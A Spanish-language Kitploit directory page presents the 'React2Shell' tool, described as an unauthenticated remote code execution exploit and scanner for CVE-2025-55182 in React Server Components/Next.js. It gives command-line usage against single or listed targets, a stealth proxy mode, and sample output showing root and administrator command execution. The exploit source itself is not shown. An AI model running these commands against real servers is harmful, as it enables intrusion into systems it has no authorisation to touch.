Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
React2Shell — CVE-2025-55182-advanced-scanner | Kitploit
Herramientas/GitHubGitHub/ankitspandey07/react2shell
Escáneres de VulnerabilidadesGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed TeamingHerramienta de Acceso Remoto
GitHubankitspandey07/react2shell

React2Shell

CVE-2025-55182-advanced-scanner

Ver Repositorio
13hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

@#React2Hell — CVE-2025-55182 Exploit

🔥 Exploit de Ejecución Remota de Código (RCE) en Next.js / React Server

█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄  ██  ██ ▄▄▄▄▄ ▄▄    ▄▄    
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██▄▄   ██████ ██▄▄  ██    ██    
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ▄▄▄███ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄ 
                                                                
{MAGENTA} Exploit RCE en Next.js/React Server — CVE-2025-55182
 Autor: Ankit Pandey GitHub: https://github.com/ankitspandey07
    🚀  React2Shell — Utilidad de Pruebas de Seguridad  🚀

════════════════════════════════════════════════════════════════════════
usage: new.py [-h] [-u URL] [-l LIST] -c COMMAND [--proxy PROXY] [--proxy-https PROXY_HTTPS]

🚀 Resumen

React2Hell es una potente herramienta de explotación diseñada para probar y explotar CVE-2025-55182, una vulnerabilidad crítica de Ejecución Remota de Código que afecta a Next.js y React Server Actions.

Existe una vulnerabilidad de ejecución remota de código sin autenticación previa en las versiones de React Server Components 19.0.0, 19.1.0, 19.1.1 y 19.2.0, incluyendo los siguientes paquetes: react-server-dom-parcel, react-server-dom-turbopack y react-server-dom-webpack. El código vulnerable deserializa de forma insegura cargas útiles de solicitudes HTTP a endpoints de Server Function.


✨ Características

  • 🧨 Ejecución Remota de Código (RCE)
  • 🌐 Escaneo de URL única / Múltiples URL
  • 🧩 Ejecución de comandos personalizados
  • 🕵️‍♂️ Modo sigiloso con soporte de proxy
  • ⚡ Rápido, fiable y fácil de usar

📌 Uso

Modo de objetivo único

python Scanner.py -u https://target.com -c "whoami"

Múltiples objetivos (desde archivo)

python Scanner.py -l urls.txt -c "whoami"

Con proxy HTTP (Burp Suite)

python Scanner.py -u https://target.com -c "whoami" --proxy 127.0.0.1:8080

Con proxy HTTPS

python Scanner.py -u https://target.com -c "whoami" --proxy-https 127.0.0.1:8080

📁 Ejemplo de urls.txt

http://site1.com
https://site2.com
http://192.168.1.10:3000

🖥️ Salida de ejemplo

PS D:\Ankitspandey07\React2Hell> python.exe .\Scanner.py -l .\list.txt -c whoami


█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄  ██  ██ ▄▄▄▄▄ ▄▄    ▄▄    
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██▄▄   ██████ ██▄▄  ██    ██    
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ▄▄▄███ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄ 
                                                                
{MAGENTA} Next.js/React Server RCE Exploit — CVE-2025-55182
 Author: Ankit Pandey GitHub: https://github.com/ankitspandey07
    🚀  React2Shell — Security Testing Utility  🚀

════════════════════════════════════════════════════════════════════════
[+] Loaded 3 targets
════════════════════════════════════════════════════════════════════════

[→] Target: http://evil.com:3113/
[→] Exec:   whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
root
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────

[→] Target: http://example.lab:2000/
[→] Exec:   whoami
[✗] Not vulnerable — Status: 200
────────────────────────────────────────────────────────────────────────

[→] Target: https://tale.lab:3000/
[→] Exec:   whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
win-1fl835ovldc\\administrator
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[✓] Scan complete — Vulnerable: 2
PS D:\Ankitspandey07\React2Hell>

⚠️ Aviso legal

Esta herramienta se crea estrictamente con fines educativos y de investigación en seguridad. NO la uses en sistemas sin autorización explícita. Eres responsable de tus propias acciones.


⭐ Apoya el proyecto

Si este exploit te ayudó, considera dejar una ⭐ en GitHub ❤️


👤 Autor

Ankit Pandey; GitHub: https://github.com/Ankitspandey07

Hecho con 🔥 por alguien que es un Pentester orgulloso y apasionado, que prospera aprendiendo en cada paso del camino.

Descargar herramienta